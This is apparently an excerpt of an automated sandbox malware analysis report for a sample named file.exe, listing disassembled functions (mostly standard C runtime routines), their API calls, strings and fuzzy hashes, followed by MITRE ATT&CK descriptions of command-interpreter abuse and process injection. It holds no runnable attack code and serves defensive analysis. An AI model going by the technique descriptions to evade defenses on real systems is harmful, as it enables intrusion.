Opcode Fuzzy Hash: 7ae0fb44a3ec765acb8fc691160abd3676b5497db462958d68dbc8fa1dcad0c2
Instruction Fuzzy Hash: 67118E317C0728EAD920F772EC87FCF7B9DDF44715F80081AB299E6052D6A8B4544744

Uniqueness

Uniqueness Score: -1.00%

Function 00426DA5, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00426DED
__fassign.LIBCMT ref: 00426FCC
__fassign.LIBCMT ref: 00426FE9
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00427031
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00427071
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042711D

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 20dff2612d617f5e7f2e0bfa3a2d3f5bad680edfda456df05f67a09ba0958eca
Instruction ID: ecf9f03be51d0e12f2ea23cea3a317be60150f7495603c0488c0cc1fbaa633c4
Opcode Fuzzy Hash: 20dff2612d617f5e7f2e0bfa3a2d3f5bad680edfda456df05f67a09ba0958eca
Instruction Fuzzy Hash: 16D1CE74E002689FCF15CFA8E9809EDBBB5FF49304F69006AE815BB341D6359D46CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EA6C, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 375COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0041EB52
__freea.LIBCMT ref: 0041EBF2
__freea.LIBCMT ref: 0041EC0E

Part of subcall function 0041F035: _free.LIBCMT ref: 0041F04D

Strings

am/pm, xrefs: 0041EC72
a/p, xrefs: 0041ECD6

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm
API String ID: 2936374016-3206640213
Opcode ID: 7e612ce1c941ce9bfa65e435f4a00cf330bfb5b66c261b615ca6e0b1e8a9f720
Instruction ID: d71ef341d30a07c85d5fdd8f906d2ae608712c58df87a86b343ff8292cc6debd
Opcode Fuzzy Hash: 7e612ce1c941ce9bfa65e435f4a00cf330bfb5b66c261b615ca6e0b1e8a9f720
Instruction Fuzzy Hash: 88C19E39900216DADB248F6AC985AFBB7B1FF49700F14415BED05AB350D2399DC2CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00417CE0, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00417CD7,00417533,00416C47), ref: 00417CEE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00417CFC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00417D15
SetLastError.KERNEL32(00000000,00417CD7,00417533,00416C47), ref: 00417D67

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: af402e95c4f32853c39417d4f23ed08070f17a8f7a8ab274655b94e4e00823c1
Instruction ID: 7cbc4a43c9fdf46767f79dc5f5bd6ec7a6adcc6870b95efec285d8df81de69ce
Opcode Fuzzy Hash: af402e95c4f32853c39417d4f23ed08070f17a8f7a8ab274655b94e4e00823c1
Instruction Fuzzy Hash: CA01D83260C7195EA6352775BC85AF767B6EF16378320023FF620451F1EF594C81955C

Uniqueness

Uniqueness Score: -1.00%

Function 004231C5, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 00423203, 0042320A, 0042323E
.D, xrefs: 00423217

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\file.exe$.D
API String ID: 0-3387770455
Opcode ID: 5c2764eb9db1d7ce962eaeb95f729e304ce6b8a39b4497cc30f40732ce21d5e4
Instruction ID: f5175974dc792da38283e94f59831f37aa4f9e6f53d6333639dff523f34ac6be
Opcode Fuzzy Hash: 5c2764eb9db1d7ce962eaeb95f729e304ce6b8a39b4497cc30f40732ce21d5e4
Instruction Fuzzy Hash: B1318671B00225EBDB21DF99AC8599FBBB8EB85711B9100ABF404D7310D7B89B41CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00425E50, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(f!@,00000000,?,0041D330,00000000,?,0041D3A8,00000000,00000000,00000000,00000000,00000000,?,0040237C), ref: 00425E55
_free.LIBCMT ref: 00425EB2
_free.LIBCMT ref: 00425EE8
SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 00425EF3

Strings

f!@, xrefs: 00425E54

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: f!@
API String ID: 2283115069-1230519027
Opcode ID: bbd2ae3955cfcc92088228961875a874c857f1f7b4632151b93e34bf203891f6
Instruction ID: f22f4f3a20eda36a27369962ac204486df73deed73b473d0e60572793873c984
Opcode Fuzzy Hash: bbd2ae3955cfcc92088228961875a874c857f1f7b4632151b93e34bf203891f6
Instruction Fuzzy Hash: 531108323009306ADA11277A7C85E2B2599ABD1B7EBE6023BF524C22E1DEB8CD01411C

Uniqueness

Uniqueness Score: -1.00%

Function 00418D87, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00418DD7

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 48670829bf43f0a4152d54f27c12e5ff13952888efe092a4fd6e4e2af4b1cc9f
Instruction ID: 21d1bef25c3c2f733d9b8903b7e08a68be804b5686698e82e59003254140fedd
Opcode Fuzzy Hash: 48670829bf43f0a4152d54f27c12e5ff13952888efe092a4fd6e4e2af4b1cc9f
Instruction Fuzzy Hash: 7F11C832E01721ABCB318B28AC44B9B3754EF157A0B24052AE902F73D1DF34DD4196ED

Uniqueness

Uniqueness Score: -1.00%

Function 004230F3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004230E8,?,?,004230B0,?,?,?), ref: 00423108
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042311B
FreeLibrary.KERNEL32(00000000,?,?,004230E8,?,?,004230B0,?,?,?), ref: 0042313E

Strings

mscoree.dll, xrefs: 00423101
CorExitProcess, xrefs: 00423113

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c30e52b87ce1e0d35694b10c989a13f1a911aa3a2d172dc758f4fb9de2a2296e
Instruction ID: 3fd44a570d3d3aa30b4c60add8ce0c5949b292e2d20ee8f27edad6efc8aac179
Opcode Fuzzy Hash: c30e52b87ce1e0d35694b10c989a13f1a911aa3a2d172dc758f4fb9de2a2296e
Instruction Fuzzy Hash: 57F08230A01519FBDB119F50DD0AB9EFB79EB00756F105061B500A1160CB788F00DA98

Uniqueness

Uniqueness Score: -1.00%

Function 0042F225, Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0042F4E1,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0042F2C8
__alloca_probe_16.LIBCMT ref: 0042F37E
__alloca_probe_16.LIBCMT ref: 0042F414
__freea.LIBCMT ref: 0042F47F
__freea.LIBCMT ref: 0042F48B

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 8b9c0f20efd9c1db0f682dd2dc1082fd2d9978251ac334b395d9c6ccabb00e55
Instruction ID: 49deb8af6b10edf06c3606a0c4022d6d61da754629e78d81dd69d19ccdab76c5
Opcode Fuzzy Hash: 8b9c0f20efd9c1db0f682dd2dc1082fd2d9978251ac334b395d9c6ccabb00e55
Instruction Fuzzy Hash: F8810431F002269BDF20DEA5E841AEF7BB59F59314FD4007BEC00A7240D7698C0987A8

Uniqueness

Uniqueness Score: -1.00%

Function 00430A40, Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00430AC4
__alloca_probe_16.LIBCMT ref: 00430B8A
__freea.LIBCMT ref: 00430BF6

Part of subcall function 00425373: RtlAllocateHeap.NTDLL(00000000,00416318,004021DA,?,0041732F,004021DC,004021DA,?,f!@,?,00416242,00416318,004021DE,004021DA,004021DA,004021DA), ref: 004253A5

__freea.LIBCMT ref: 00430BFF
__freea.LIBCMT ref: 00430C22

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: f5e10dcb4e1b5180149dcfde1ee7066194664871545ea3846a539fd62bd0da3b
Instruction ID: aae3ed12384742570996b07145b7cc33cb17a9f70ae160d4cad1b6566b2d129e
Opcode Fuzzy Hash: f5e10dcb4e1b5180149dcfde1ee7066194664871545ea3846a539fd62bd0da3b
Instruction Fuzzy Hash: 7D513672600216AFEF245F95DC51FBF7BA9DF48758F14122AFD0497250E778EC418298

Uniqueness

Uniqueness Score: -1.00%

Function 0042CA68, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042CA80

Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00

_free.LIBCMT ref: 0042CA92
_free.LIBCMT ref: 0042CAA4
_free.LIBCMT ref: 0042CAB6
_free.LIBCMT ref: 0042CAC8

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8d7711ed1f3d710bc71b8934c021647d63756fe8dce82523900df8435153359a
Instruction ID: 3e30a90eec24ba82b40bb39c08b55b1911a2b8f70f3ac1706e663f63c14e5b6a
Opcode Fuzzy Hash: 8d7711ed1f3d710bc71b8934c021647d63756fe8dce82523900df8435153359a
Instruction Fuzzy Hash: CCF03C3274422CAB8A20EB59F5C2E1E77DDEA407157D50C0AF019D7A01C628FC808A5C

Uniqueness

Uniqueness Score: -1.00%

Function 004105C0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 215COMMON

Download Yara Rule

Strings

true, xrefs: 00410688
null, xrefs: 004107ED
false, xrefs: 004106CC

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: false$null$true
API String ID: 0-2913297407
Opcode ID: cf527f57543795860667fa2d1ff9add848aa0be06ad6aa732714e453a202084c
Instruction ID: 2627b525dfe0767b958972f9fa426b8e5079c283e1f8cb494701fc8a6cc70701
Opcode Fuzzy Hash: cf527f57543795860667fa2d1ff9add848aa0be06ad6aa732714e453a202084c
Instruction Fuzzy Hash: FF515AB2B002041BE7206B25E84679777949F95365F04426BEC488B2D2F7FAD8D48699

Uniqueness

Uniqueness Score: -1.00%

Function 00426007, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0042608E

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 4a51762b48c1edabe2c0848022661543819ff70b16c697e639a73c78acec0c79
Instruction ID: d943f78719edc19706b6cdc1e86aa1519e879c04837a2d813e89a83390d0512f
Opcode Fuzzy Hash: 4a51762b48c1edabe2c0848022661543819ff70b16c697e639a73c78acec0c79
Instruction Fuzzy Hash: 29B13431B002659FDB11DF28D8817BEBBA5EF55300F5681ABD8519B342D63C9D02CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00417DC0, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00417E87
___AdjustPointer.LIBCMT ref: 00417EAA
___AdjustPointer.LIBCMT ref: 00417F46

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: aefb51fe6224af82109526f6ac7ce57d839f1fd428b54d264c825180a72973e6
Instruction ID: f3e96f547d38daad7089fa0d9b8ca550fdb55ab944dabffe9782127b6fce0068
Opcode Fuzzy Hash: aefb51fe6224af82109526f6ac7ce57d839f1fd428b54d264c825180a72973e6
Instruction Fuzzy Hash: B251BA72608706AFDB298F11D941BEAB7F4EF04314F2444AFE81146691E739ACD1CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042A23C, Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08eb012a960c6c7adae0bbf3c245a16046c89a631ac914cdcc819b03dd376a4e
Instruction ID: 73dca2ba3f8e1879c6b02ebd43662e10590afcf8ec5fcb7453fdc533bd91696c
Opcode Fuzzy Hash: 08eb012a960c6c7adae0bbf3c245a16046c89a631ac914cdcc819b03dd376a4e
Instruction Fuzzy Hash: 3D4127B1B00324EFD714DF38DD01B9ABBA8EB48710F10466FF851DB381D2B999508795

Uniqueness

Uniqueness Score: -1.00%

Function 004314EA, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004315BA
_free.LIBCMT ref: 004315E3
SetEndOfFile.KERNEL32(00000000,0042FA9F,00000000,00428221,?,?,?,?,?,?,?,0042FA9F,00428221,00000000), ref: 00431615
GetLastError.KERNEL32(?,?,?,?,?,?,?,0042FA9F,00428221,00000000,?,?,?,?,00000000), ref: 00431631

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 8364342a33e1f6661a6bce5336ba765543fa0960d464618dc439d72a20529d32
Instruction ID: a34b602a5d135cfd9f6470e1a6e2cd4d52c0270752290004bd760e0389dd2d70
Opcode Fuzzy Hash: 8364342a33e1f6661a6bce5336ba765543fa0960d464618dc439d72a20529d32
Instruction Fuzzy Hash: AB41F672B00510BBCB116FB99C42B9E37B9AF8C364F24151BF416E72B1DA3CD9514768

Uniqueness

Uniqueness Score: -1.00%

Function 00425CF9, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0041A7CC,?,f!@,?,?,0041A887,?,f!@,?), ref: 00425CFE
_free.LIBCMT ref: 00425D5B
_free.LIBCMT ref: 00425D91
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,0041A887,?,f!@,?), ref: 00425D9C

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 94886a939363e5aafdd5e2de4b9380293d13e076148c1a5ad2d372cc562b468d
Instruction ID: 1c39bac3d6d59f3acbb9d9d96adc0eaff759205db5fa5e89b564f90778c45ebd
Opcode Fuzzy Hash: 94886a939363e5aafdd5e2de4b9380293d13e076148c1a5ad2d372cc562b468d
Instruction Fuzzy Hash: 2E11C6367109346BEA1027767C8DE2B2699DBC1B7DBE5423BF624C22E2DE7D8C01415C

Uniqueness

Uniqueness Score: -1.00%

Function 0044DD0C, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

__abstract_cw.LIBCMTD ref: 0044DD51
__hw_cw.LIBCMTD ref: 0044DD7B
__abstract_cw.LIBCMTD ref: 0044DD93
___control87_sse2.LIBCMTD ref: 0044DDAF

Memory Dump Source

Source File: 00000000.00000002.929630304.0000000000448000.00000020.00020000.sdmp, Offset: 00448000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_448000_file.jbxd

Similarity

API ID: __abstract_cw$___control87_sse2__hw_cw
String ID:
API String ID: 3606251187-0
Opcode ID: 21e5a4de1c9c4492427c1859670cc4865c80b52e1f401961d206ac67672534a1
Instruction ID: 6279c90b5396187b74596de2a687d4d336f7478526d914da44dc8a177037047b
Opcode Fuzzy Hash: 21e5a4de1c9c4492427c1859670cc4865c80b52e1f401961d206ac67672534a1
Instruction Fuzzy Hash: 0E218DB1D00109EFDB20DFA1D886AAEBBB1FF04304F11449AD8165B216DB349A60CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0044DD40, Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

__abstract_cw.LIBCMTD ref: 0044DD51
__hw_cw.LIBCMTD ref: 0044DD7B
__abstract_cw.LIBCMTD ref: 0044DD93
___control87_sse2.LIBCMTD ref: 0044DDAF

Memory Dump Source

Source File: 00000000.00000002.929630304.0000000000448000.00000020.00020000.sdmp, Offset: 00448000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_448000_file.jbxd

Similarity

API ID: __abstract_cw$___control87_sse2__hw_cw
String ID:
API String ID: 3606251187-0
Opcode ID: c895c6aa48716006e6ab43ea85949847f5145d9c412a502c61110697ef77a3a7
Instruction ID: b60551110041ca6812d50555a666ec930fdac1823aa6fd107524c68c9358aeb0
Opcode Fuzzy Hash: c895c6aa48716006e6ab43ea85949847f5145d9c412a502c61110697ef77a3a7
Instruction Fuzzy Hash: ED217FB5E0010DEBEF04DF95D882AEEB7B5BF44301F10849AE815A7204E738EE40CB56

Uniqueness

Uniqueness Score: -1.00%

Function 004313C2, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,0042EEAF,00000000,00000001,00000000,00000000,?,0042717A,00000000,?,00000000), ref: 004313D9
GetLastError.KERNEL32(?,0042EEAF,00000000,00000001,00000000,00000000,?,0042717A,00000000,?,00000000,00000000,00000000,?,004276CE,?), ref: 004313E5

Part of subcall function 004313AB: CloseHandle.KERNEL32(FFFFFFFE,004313F5,?,0042EEAF,00000000,00000001,00000000,00000000,?,0042717A,00000000,?,00000000,00000000,00000000), ref: 004313BB

___initconout.LIBCMT ref: 004313F5

Part of subcall function 0043136D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0043139C,0042EE9C,00000000,?,0042717A,00000000,?,00000000,00000000), ref: 00431380

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,0042EEAF,00000000,00000001,00000000,00000000,?,0042717A,00000000,?,00000000,00000000), ref: 0043140A

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 8a122dc80a4656cc1f5ef104a01b190192e5d2ec304f358db94e81f76ea591d9
Instruction ID: c2d4d8bf00602c5290a3d0a1226214ac148d2f423b4f85e531053faa6dc93eb7
Opcode Fuzzy Hash: 8a122dc80a4656cc1f5ef104a01b190192e5d2ec304f358db94e81f76ea591d9
Instruction Fuzzy Hash: 01F0C036501524BBDF261FA5DC05D9A3F66FB0D3B5F555035FE2896131C6328820ABD8

Uniqueness

Uniqueness Score: -1.00%

Function 00423D62, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00423D6B

Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00

_free.LIBCMT ref: 00423D7E
_free.LIBCMT ref: 00423D8F
_free.LIBCMT ref: 00423DA0

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0eacfc734d2c43d416cff60cc544c206e25de6a074945f5097732c0b08f39dc9
Instruction ID: 85650dbc5ff5234b85e40e64ea43965e1665b56efa49b1ec533703476f555bad
Opcode Fuzzy Hash: 0eacfc734d2c43d416cff60cc544c206e25de6a074945f5097732c0b08f39dc9
Instruction Fuzzy Hash: CCE0867C401130FA8A222F21BC03A097E21E7B6F17393016BF41442331C73657619B8C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F820, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213COMMON

Download Yara Rule

Strings

vector<T> too long, xrefs: 0040F9E0
r+@, xrefs: 0040F9A5, 0040F94E

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: r+@$vector<T> too long
API String ID: 0-3634607103
Opcode ID: 3c11e8be36af1e566edba1bf7d66869c852f1abf937243228d3330634d6e1631
Instruction ID: 5f9cba469d40273e6ec0acfff7f346d64c3ba8640895a30e293009e442d03abb
Opcode Fuzzy Hash: 3c11e8be36af1e566edba1bf7d66869c852f1abf937243228d3330634d6e1631
Instruction Fuzzy Hash: 705158B29002109BC724AF28DC40AABB7E5EF85314F14063FF855A7791D738E94987D9

Uniqueness

Uniqueness Score: -1.00%

Function 004021D0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004021D5

Part of subcall function 00416307: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00416313

Strings

f!@, xrefs: 004021E6, 004021E5, 004022B7, 004022E7
string too long, xrefs: 004021D0

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: f!@$string too long
API String ID: 1997705970-1334407247
Opcode ID: 65de0f17033ae5e7fbcfb42e73b9f7c46c61be76540724522559fb5c4849dbf5
Instruction ID: 9d11292a31a92fdd549a9ab56056697053aeb21c499ce90459df23cdd6e9b045
Opcode Fuzzy Hash: 65de0f17033ae5e7fbcfb42e73b9f7c46c61be76540724522559fb5c4849dbf5
Instruction Fuzzy Hash: EE4137B16003044FC7249F74DAC866EB3A9AF85314B240A3FE852D77D1E7BDE8488769

Uniqueness

Uniqueness Score: -1.00%

Function 004183CD, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004183F2

Strings

MOC, xrefs: 00418404
RCC, xrefs: 0041840C

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: d930d2330f3127baba7ea769631e6e483657b218a86f1fe839cc6047e2e7df05
Instruction ID: 16b447a73039b8e68cc3dd9bb5533b7a8677c9bf7377e19712ffa2ee5020701b
Opcode Fuzzy Hash: d930d2330f3127baba7ea769631e6e483657b218a86f1fe839cc6047e2e7df05
Instruction Fuzzy Hash: 62415B7290020AAFCF16DF98CD81AEEBBB5FF48304F15815EF91467211EB399990DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042D6A7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042C65F: EnterCriticalSection.KERNEL32(00000000,?,00427582,00000000,00440D18,00000010,004252FA,00000000,?,?,?,?,?,00426B98,?,f!@), ref: 0042C67A

FlushFileBuffers.KERNEL32(00000000,00440ED8,0000000C,0042D7AE,WRB,?,00000001,?,00425257,?), ref: 0042D6F0
GetLastError.KERNEL32 ref: 0042D701

Strings

WRB, xrefs: 0042D728

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: WRB
API String ID: 4109680722-2263744077
Opcode ID: 665eba45340f9231d11835aba0f1a6f9c9ed3dce31b7ac4b1ae2e6ef1e596464
Instruction ID: c1aa163a20503948efc7cc34811fe0dff4b120f0576b7117c8c4efa99648f7df
Opcode Fuzzy Hash: 665eba45340f9231d11835aba0f1a6f9c9ed3dce31b7ac4b1ae2e6ef1e596464
Instruction Fuzzy Hash: 700180B6B002249FC704AFA9E94565D7BB4EF49724F50422FF411DB3E1DB7C98418B98

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

